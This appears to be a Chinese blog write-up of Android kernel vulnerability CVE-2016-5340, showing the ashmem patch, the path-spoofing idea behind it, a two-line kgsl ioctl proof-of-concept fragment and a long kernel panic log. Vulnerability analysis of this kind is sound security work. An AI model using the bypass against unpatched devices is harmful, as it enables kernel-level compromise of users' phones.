2016-09-20

CVE-2016-5340

patch

 static int is_ashmem_file(struct file *file)
{
-   char fname[256], *name;
-   name = dentry_path(file->f_dentry, fname, 256);
-   return strcmp(name, "/ashmem") ? 0 : 1;
+   return (file->f_op == &ashmem_fops);
}

dentry_path: 获取文件全路径,相对挂载点

shell@hammerhead:/ $ mount
rootfs / rootfs ro,seclabel,relatime 0 0
tmpfs /dev tmpfs rw,seclabel,nosuid,relatime,mode=755 0 0
devpts /dev/pts devpts rw,seclabel,relatime,mode=600 0 0
proc /proc proc rw,relatime 0 0
sysfs /sys sysfs rw,seclabel,relatime 0 0
selinuxfs /sys/fs/selinux selinuxfs rw,relatime 0 0
debugfs /sys/kernel/debug debugfs rw,relatime 0 0
none /acct cgroup rw,relatime,cpuacct 0 0
none /sys/fs/cgroup tmpfs rw,seclabel,relatime,mode=750,gid=1000 0 0
tmpfs /mnt/obb tmpfs rw,seclabel,relatime,mode=755,gid=1000 0 0
none /dev/cpuctl cgroup rw,relatime,cpu 0 0
/dev/block/platform/msm_sdcc.1/by-name/system /system ext4 ro,seclabel,relatime,data=ordered 0 0
/dev/block/platform/msm_sdcc.1/by-name/userdata /data ext4 rw,seclabel,nosuid,nodev,noatime,nomblk_io_submit,noauto_da_alloc,errors=panic,data=ordered 0 0

so:


data, system, proc, /mnt/obb
/data/ashmem :  /ashmem
/data/local/tmp/ashmem: /local/tmp/ashmem
/mnt/obb/ashmem: /ashmem

poc

fd_kgsl = open("/dev/kgsl-3d0", O_RDWR);
ioctl(fd_kgsl, IOCTL_KGSL_MAP_USER_MEM, &param);

crash log

 dev="proc" ino=10477 scontext=u:r:untrusted_app:s0 tcontext=u:r:radio:s0 tclass=dir
[  269.002841] Unable to handle kernel NULL pointer dereference at virtual address 00000114
[  269.003276] pgd = e9f24000
[  269.003497] [00000114] *pgd=33293831, *pte=00000000, *ppte=00000000
[  269.020211] Internal error: Oops: 17 [#1] PREEMPT SMP ARM
[  269.020398] CPU: 0    Not tainted  (3.4.0-gd59db4e #1)
[  269.020506] PC is at get_ashmem_file+0x78/0x154
[  269.020676] LR is at is_ashmem_file+0x3c/0x68
[  269.020772] pc : [<c078e704>]    lr : [<c078df24>]    psr: 20000013
[  269.020776] sp : eb73ddb8  ip : eb73dc98  fp : eb73de1c
[  269.021027] r10: 00000004  r9 : c10e9008  r8 : eb73de5c
[  269.021196] r7 : eb73de58  r6 : eb73de54  r5 : c103a488  r4 : ebbc9240
[  269.021291] r3 : 19761abc  r2 : 00000000  r1 : c0deb698  r0 : 00000000
[  269.021464] Flags: nzCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[  269.021560] Control: 10c5787d  Table: 3232406a  DAC: 00000015
[  269.021729]
[  269.021731] PC: 0xc078e684:
[  269.021906] e684  c011b554 c12a52b4 e1a0c00d e92ddff0 e24cb004 e24dd03c e52de004 e8bd4000
[  269.022856] e6a4  e59f511c e1a08003 e1a06001 e1a07002 e1a0a000 e5953000 e50b3030 ebeb5d64
[  269.023810] e6c4  e3a0c000 e586c000 e587c000 e2504000 0a000036 e59f90ec e1d931b2 e3130004
[  269.024684] e6e4  1a000018 e1a00004 ebfffdfd e3500000 0a00000d e594207c e3a00000 e5864000
[  269.025645] e704  e5923114 e5873000 e5923118 e5883000 e51b2030 e5953000 e1520003 1a000001
[  269.026609] e724  e24bd028 e89daff0 ebe81142 e1a0100a e59f0094 eb0a27bf e1a00004 ebeb5e68
[  269.027563] e744  e3e00000 eafffff1 e1a0200d e3c23d7f e3c3303f e24b0041 e593300c e593c224
[  269.028451] e764  e1a01003 e50bc048 ebeb6f73 e594300c e1a02006 e51bc048 e594e01c e5933020
[  269.029408]
[  269.029411] LR: 0xc078dea4:
[  269.029585] dea4  e594311c e5941118 e5902008 e0810003 e1500002 8afffff1 e1a00003 e3a02000
[  269.030541] dec4  e12fff36 e595300c e59301ec e2800038 ebe8ad33 e3a00000 e89da878 e3e00015
[  269.031501] dee4  e89da878 e1a0c00d e92dd810 e24cb004 e24ddf43 e52de004 e8bd4000 e59f4040
[  269.032466] df04  e3a02c01 e24b1f46 e590000c e5943000 e50b3018 ebebb5a7 e59f1028 ebf19143
[  269.033348] df24  e51b2018 e5943000 e2700001 33a00000 e1520003 1a000001 e24bd010 e89da810
[  269.034303] df44  ebe8133c c103a488 c0deb690 e1a0c00d e92ddff0 e24cb004 e24dd00c e52de004
[  269.035262] df64  e8bd4000 e5913004 e1a09001 e3530000 0a00003b e5913000 e3130080 0a00003c
[  269.036153] df84  e59f60f4 e286003c eb0a64db e3500000 0a000037 e5b64058 e1540006 e5945000
[  269.037106]
[  269.037108] SP: 0xeb73dd38:
[  269.037357] dd38  ebbc9300 ea7f67c0 eb73dd5c c078e704 20000013 ffffffff eb73dda4 eb73de5c
[  269.038229] dd58  c10e9008 00000004 eb73de1c eb73dd70 c0106e98 c010022c 00000000 c0deb698
[  269.039179] dd78  00000000 19761abc ebbc9240 c103a488 eb73de54 eb73de58 eb73de5c c10e9008
[  269.040129] dd98  00000004 eb73de1c eb73dc98 eb73ddb8 c078df24 c078e704 20000013 ffffffff
[  269.041004] ddb8  000080d0 c04aad10 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0
[  269.041953] ddd8  ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000
[  269.042829] ddf8  00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20
[  269.043775] de18  c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b
[  269.044652]
[  269.044654] IP: 0xeb73dc18:
[  269.044901] dc18  ec495100 c0278008 eb73dc64 eb73dc30 c0278bb4 c0277fd0 00000000 00000000
[  269.045780] dc38  00000028 00010000 c027c0ec c1034300 ec523480 eb73dc9c eb73de58 c027b63c
[  269.046749] dc58  eb73dc94 eb73dc68 c027b63c c0a29650 eb73dc84 00000100 c039bab0 00000000
[  269.047633] dc78  eb73dc94 c103a488 c103a488 eb73de54 eb73ddb4 00000017 eb73dd70 c104541c
[  269.048594] dc98  00000114 eb73de5c c10e9008 00000004 eb73dd6c eb73dcb8 c0100284 c0114744
[  269.049476] dcb8  00000000 ec523100 ec523680 00000000 ebbc90c0 ec6498c0 eb73dcec eb73dce0
[  269.050434] dcd8  c0a26edc c0a26d50 eb73dd1c eb73dcf0 c0384648 c0a26ed0 ec523124 00000000
[  269.051397] dcf8  eb73dd1c ebbc90c0 c12866f0 c103a488 ebbc9300 ea7f67c0 ebbc90d4 ebbc90d0
[  269.052351]
[  269.052353] FP: 0xeb73dd9c:
[  269.052527] dd9c  eb73de1c eb73dc98 eb73ddb8 c078df24 c078e704 20000013 ffffffff 000080d0
[  269.053480] ddbc  c04aad10 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0 ec044ff8
[  269.054363] dddc  c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000
[  269.055324] ddfc  ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018
[  269.056282] de1c  c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008
[  269.057240] de3c  ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000
[  269.058119] de5c  00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94
[  269.059070] de7c  bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000
[  269.060026]
[  269.060029] R1: 0xc0deb618:
[  269.060202] b618  613e363c 656d6873 69203a6d 6974696e 7a696c61 000a6465 2f766564 6d687361
[  269.061160] b638  002f6d65 2f766564 6d687361 00006d65 613e333c 656d6873 66203a6d 656c6961
[  269.062118] b658  6f742064 726e7520 73696765 20726574 6373696d 76656420 21656369 0000000a
[  269.063000] b678  613e363c 656d6873 75203a6d 616f6c6e 0a646564 00000000 6873612f 006d656d
[  269.063958] b698  613e333c 656d6873 25203a6d 72203a73 65757165 64657473 74616420 72662061
[  269.064909] b6b8  66206d6f 20656c69 63736564 74706972 7420726f 20746168 73656f64 2074276e
[  269.065797] b6d8  73697865 000a2e74 706c6966 20702520 76656472 20642520 20646970 25287525
[  269.066754] b6f8  66202973 20656c69 25287025 2029646c 20766564 203a6469 000a6425 663e333c
[  269.067710]
[  269.067713] R4: 0xebbc91c0:
[  269.067888] 91c0  00000000 00000000 ed3c8a00 00000000 00000000 00000000 00000000 00000000
[  269.068842] 91e0  00000000 00000000 ffffffff ffffffff 00000000 00000000 eb761dc0 eb761b00
[  269.069803] 9200  ebbc9200 ebbc9200 ebbc9208 ebbc9208 ed34d5f0 00000000 00000000 00000000
[  269.070680] 9220  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  269.071635] 9240  ebbc9cc0 fefe1274 ed2f3e50 ec523480 c0b19540 00000000 00000000 00000002
[  269.072584] 9260  00020002 0000001f 00000000 00000000 00000000 00000000 00000000 00000000
[  269.073465] 9280  00000000 00000000 eaff1d00 00000000 00000000 00000000 00000000 00000020
[  269.074334] 92a0  00000000 00000000 ffffffff ffffffff 00000000 00000000 ea7f6800 00000000
[  269.075298]
[  269.075301] R5: 0xc103a408:
[  269.075477] a408  0fbd0b82 c561aad9 046a0e5f ceb6af04 90d34de8 5a0fecb3 a5d9c4e1 6f0565ba
[  269.076437] a428  31608756 fbbc260d 3ab7828b f06b23d0 ae0ec13c 64d26067 215c8068 4a3d3003
[  269.077396] a448  a02ec7d8 e2850203 a3c40529 c9478a99 5269f8b0 155b7d2b a6c55264 4fb78cab
[  269.078270] a468  db234dfd f3d3f258 c0dad457 449e4cdb 3c1e80d2 59791ef8 00000001 00000000
[  269.079152] a488  19761abc c010d028 ffffffff 00000009 0007b0d7 c0118560 c0118514 c01182c0
[  269.080109] a4a8  c011836c c0118384 c0118384 c0118388 c0118388 c0118404 c01184ec c01184fc
[  269.081061] a4c8  c011843c c0118484 c01184b8 00000022 ffffffff 00000000 fa002000 fa003000
[  269.082008] a4e8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  269.082886]
[  269.082888] R6: 0xeb73ddd4:
[  269.083137] ddd4  c03f06e0 ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00
[  269.084019] ddf4  eb73c000 00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c
[  269.084972] de14  eb73de20 c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c
[  269.085926] de34  14104a1b 00000008 ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90
[  269.086876] de54  ebbc9240 00000000 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488
[  269.087752] de74  c04aaccc eb73de94 bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0
[  269.088711] de94  00000004 00501000 00000000 00000000 00500000 00000001 00000000 00000009
[  269.089669] deb4  00000001 eb73c000 eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc
[  269.090551]
[  269.090554] R7: 0xeb73ddd8:
[  269.090803] ddd8  ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000
[  269.091762] ddf8  00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20
[  269.092645] de18  c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b
[  269.093604] de38  00000008 ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240
[  269.094559] de58  00000000 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc
[  269.095443] de78  eb73de94 bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004
[  269.096406] de98  00501000 00000000 00000000 00500000 00000001 00000000 00000009 00000001
[  269.097364] deb8  eb73c000 eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc
[  269.098314]
[  269.098316] R8: 0xeb73dddc:
[  269.098492] dddc  c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000
[  269.099442] ddfc  ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018
[  269.100320] de1c  c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008
[  269.101272] de3c  ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000
[  269.102229] de5c  00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94
[  269.103183] de7c  bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000
[  269.104066] de9c  00000000 00000000 00500000 00000001 00000000 00000009 00000001 eb73c000
[  269.105015] debc  eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc c0398d0c
[  269.105967]
[  269.105969] R9: 0xc10e8f88:
[  269.106145] 8f88  0000002c 00000000 c0d4c634 c0babed4 c0de8d3c c0de8db4 00000033 00000000
[  269.107094] 8fa8  c0d4c634 c0babed4 c0de8d3c c0de8de0 0000003a 00000000 c0d4c634 c0babed4
[  269.108046] 8fc8  c0de8d3c c0de8e00 0000004b 00000000 c0de8ed0 c0babeec c0de8ed8 c0de8e1c
[  269.108925] 8fe8  0000001e 00000000 c0de8ed0 c0babeec c0de8ed8 c0de8e3c 00000026 00000000
[  269.109881] 9008  c0deb640 c0bac2e8 c0deb748 c0deb6e0 0000032c 00000000 c0deb640 c0bac2f8
[  269.110837] 9028  c0deb748 c0deb6e8 00000343 00000000 c0d06940 c0bac57c c0ded100 c0d6a0d0
[  269.111798] 9048  000000eb 00000000 c0d06940 c0bac5a8 c0ded100 c0debe08 0000043f 00000000
[  269.112684] 9068  c0d06940 c0bac5a8 c0ded100 c0debe28 00000441 00000000 c0d06940 c0bac5a8
[  269.113573] Process poc (pid: 3498, stack limit = 0xeb73c2f0)
[  269.113744] Stack: (0xeb73ddb8 to 0xeb73e000)
[  269.113841] dda0:                                                       000080d0 c04aad10
[  269.114015] ddc0: 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0 ec044ff8 c03f0780
[  269.114113] dde0: eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000 ed2b0580
[  269.114287] de00: eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018 c078e698
[  269.114459] de20: c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008 ed34ac20
[  269.114633] de40: 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000 00002000
[  269.114733] de60: eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94 bed22a68
[  269.114907] de80: eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000 00000000
[  269.115078] dea0: 00000000 00500000 00000001 00000000 00000009 00000001 eb73c000 eb73df14
[  269.115176] dec0: 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc c0398d0c 00000000
[  269.115349] dee0: ebbc9300 00000005 ebbc9300 bed22a68 ed34ac20 00000000 eb73df74 eb73df08
[  269.115522] df00: c02753ac c04aa5dc c0279324 00000000 00000000 00000001 00000000 ed59b6d0
[  269.115695] df20: ededee00 eb73df0c 00000005 00000000 bed22a68 c01c0915 ebbc9300 00000005
[  269.115792] df40: eb73c000 00000000 eb73df64 00000000 bed22a68 c01c0915 ebbc9300 00000005
[  269.115964] df60: eb73c000 00000000 eb73dfa4 eb73df78 c0275950 c0275324 ffffffff 00000000
[  269.116141] df80: c0107544 00000000 bed22a68 ffffffff 00000036 c0107544 00000000 eb73dfa8
[  269.116317] dfa0: c0107300 c02758e0 00000000 bed22a68 00000005 c01c0915 bed22a68 bed22a38
[  269.116414] dfc0: 00000000 bed22a68 ffffffff 00000036 000080f4 00000000 00000000 bed22aec
[  269.116589] dfe0: 00500000 bed22a28 0000e377 0001120c 80000010 00000005 00000000 00000000
[  269.116793] [<c078e704>] (get_ashmem_file+0x78/0x154) from [<c04ab018>] (kgsl_ioctl_map_user_mem+0x34c/0xa00)
[  269.116981] [<c04ab018>] (kgsl_ioctl_map_user_mem+0x34c/0xa00) from [<c04aa810>] (kgsl_ioctl+0x240/0x31c)
[  269.117088] [<c04aa810>] (kgsl_ioctl+0x240/0x31c) from [<c02753ac>] (do_vfs_ioctl+0x94/0x5bc)
[  269.117267] [<c02753ac>] (do_vfs_ioctl+0x94/0x5bc) from [<c0275950>] (sys_ioctl+0x7c/0x8c)
[  269.117453] [<c0275950>] (sys_ioctl+0x7c/0x8c) from [<c0107300>] (ret_fast_syscall+0x0/0x30)
[  269.117632] Code: 0a00000d e594207c e3a00000 e5864000 (e5923114)
[  269.121735] ---[ end trace 032dae055767b39f ]---
[  269.121877] Kernel panic - not syncing: Fatal exception
[  270.122308] Rebooting in 5 seconds..
[  275.123947] Going down for restart now
[  275.124870] Calling SCM to disable SPMI PMIC arbiter
时间:

没有评论:

发表评论

订阅: 博文评论 (Atom)

Android Root Zap Framework

‎ 1. Warning 请遵守GPL开源协议, 请遵守法律法规, 本项目仅供学习和交流, 请勿用于非法用途! 道路千万条, 安全第一条, 行车不规范, 亲人两行泪. 2. Android Root Zap Frame...

  • 安卓注入框架Xposed分析与简单应用
    概述 Xposed是针对Android平台的动态劫持项目,源码 github 主要模块说明如下: Xposed :Xposed的C++部分,主要是用来替换/system/bin/app_process,并为XposedBridge...
  • 安卓注入框架Xposed用法详解
        之前 安卓注入框架Xposed分析与简单应用 只是简单的了解了一下xposed框架,知道如何hook函数,并没有深入去使用,也不知道这个框架能用到哪种程度,最近详细的总结了下,简单来说就是,没有hook不到的地方,只有你想不到的地方。...
  • 安卓CPU,GPU,IO,缓存工作模式查看与修改
    CPU工作模式 简介 在android系统的耗电量排行里,cpu的耗电占了比较大的一部分比例,也就是说,cpu的使用率和使用频率将直接或间接的影响电量的分配和使用,同时也会影响系统的流畅度。android-sdk中没有为android...